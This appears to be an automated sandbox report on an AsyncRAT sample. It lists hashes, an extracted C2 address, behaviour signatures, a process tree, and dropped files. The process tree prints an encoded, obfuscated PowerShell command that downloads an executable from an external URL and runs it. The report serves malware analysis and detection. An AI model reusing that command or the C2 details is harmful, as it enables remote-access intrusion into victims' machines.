Analysis

  • max time kernel
    151s
  • max time network
    185s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    13-11-2022 15:17

General

  • Target

    1c3703e6a606a118618df7103ff5688021d20768c90f5d5fc8401a13797f367c.exe

  • Size

    5KB

  • MD5

    62bdf784440078b827c9da994a51f08c

  • SHA1

    a49ddd1891695b59cd5ae63897c08ac997e22aac

  • SHA256

    1c3703e6a606a118618df7103ff5688021d20768c90f5d5fc8401a13797f367c

  • SHA512

    a2ab985f5b9b8d0e1c7dfe49597ba9e0325e2d0467156903b040149c258daeff04c59ef1c86ecf95c912980f65ffe35c7794cb5d5a95e165f0ea297ff7dd4acd

  • SSDEEP

    96:l79tll3VI2UntHa4vk+PN8+/fZUHxUd3ojVrl:N9t/33sw4vkC8+/fUUdQ

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    System Guard Runtime

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c3703e6a606a118618df7103ff5688021d20768c90f5d5fc8401a13797f367c.exe
    "C:\Users\Admin\AppData\Local\Temp\1c3703e6a606a118618df7103ff5688021d20768c90f5d5fc8401a13797f367c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAdQBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMAA5ADMAMQA4ADIAMgA1ADQAMgAwADAAMAAxADQAOQAvADEAMAA0ADAAOQAzADgANwAzADUANgAyADMAMgAxADMAMgAwADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAG0AYwB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBlAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABrAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAzADQAMgAxADMAMwB3AC4AZQB4AGUAJwApACkAPAAjAHEAbAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAYwB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGoAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyADMANAAyADEAMwAzAHcALgBlAHgAZQAnACkAPAAjAGYAagB1ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4816
      • C:\Users\Admin\AppData\Roaming\2342133w.exe
        "C:\Users\Admin\AppData\Roaming\2342133w.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4656
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
  • C:\Users\Admin\AppData\Roaming\2342133w.exe
    C:\Users\Admin\AppData\Roaming\2342133w.exe
    1⤵
    • Executes dropped EXE
    PID:420

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2342133w.exe.log
    Filesize

    902B

    MD5

    22ef0590c345545e384ba168af281f75

    SHA1

    77a5e71b08568a14c7305f479a073a27fd73bb9e

    SHA256

    ddc570d8f07709e4c8bbca0c8408d423f767aeabe413be9953fa999bcd66ea9f

    SHA512

    150d090f4d6278159a1d0eab0a4d67794c5eeed5484c6091cd055eac3a88d8e580655d5d5d3e46c62276e300d30625a1e7d1a9325ce1eb58cf2a1876777ac617

  • C:\Users\Admin\AppData\Roaming\2342133w.exe
    Filesize

    14.7MB

    MD5

    2cbd5d9d43c5c49f0580975e9e620808

    SHA1

    17e209b6d6c66882ed78a40d7e0d211760b489a0

    SHA256

    399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

    SHA512

    26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

  • C:\Users\Admin\AppData\Roaming\2342133w.exe
    Filesize

    14.7MB

    MD5

    2cbd5d9d43c5c49f0580975e9e620808

    SHA1

    17e209b6d6c66882ed78a40d7e0d211760b489a0

    SHA256

    399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

    SHA512

    26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

  • C:\Users\Admin\AppData\Roaming\2342133w.exe
    Filesize

    14.7MB

    MD5

    2cbd5d9d43c5c49f0580975e9e620808

    SHA1

    17e209b6d6c66882ed78a40d7e0d211760b489a0

    SHA256

    399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

    SHA512

    26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

  • memory/1652-115-0x0000000000400000-0x0000000000408000-memory.dmp
    Filesize

    32KB

  • memory/4656-181-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-201-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-147-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-148-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-149-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-150-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-151-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-153-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-154-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-155-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-156-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-157-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-158-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-159-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-160-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-161-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-162-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-163-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-164-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-165-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-166-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-167-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-168-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-169-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-170-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-171-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-172-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-173-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-174-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-175-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-176-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-177-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-178-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-179-0x00000000006E0000-0x0000000001590000-memory.dmp
    Filesize

    14.7MB

  • memory/4656-180-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-145-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-194-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-141-0x0000000000000000-mapping.dmp
  • memory/4656-144-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-185-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-186-0x00000000082B0000-0x0000000008476000-memory.dmp
    Filesize

    1.8MB

  • memory/4656-187-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-188-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-189-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-190-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-191-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-192-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-193-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-182-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-195-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-196-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-197-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-198-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-199-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-200-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-146-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-202-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-203-0x00000000061A0000-0x000000000623C000-memory.dmp
    Filesize

    624KB

  • memory/4656-204-0x0000000006740000-0x0000000006C3E000-memory.dmp
    Filesize

    5.0MB

  • memory/4656-205-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-206-0x0000000006540000-0x00000000065D2000-memory.dmp
    Filesize

    584KB

  • memory/4656-207-0x0000000006680000-0x000000000671C000-memory.dmp
    Filesize

    624KB

  • memory/4656-211-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-183-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4656-184-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4816-125-0x0000023066D00000-0x0000023066D76000-memory.dmp
    Filesize

    472KB

  • memory/4816-116-0x0000000000000000-mapping.dmp
  • memory/4816-122-0x0000023066240000-0x0000023066262000-memory.dmp
    Filesize

    136KB

  • memory/4856-208-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

  • memory/4856-209-0x000000000040D0EE-mapping.dmp
  • memory/4856-210-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4856-212-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4856-213-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4856-214-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB

  • memory/4856-292-0x0000000005F80000-0x0000000005FE6000-memory.dmp
    Filesize

    408KB

  • memory/4856-215-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
    Filesize

    1.6MB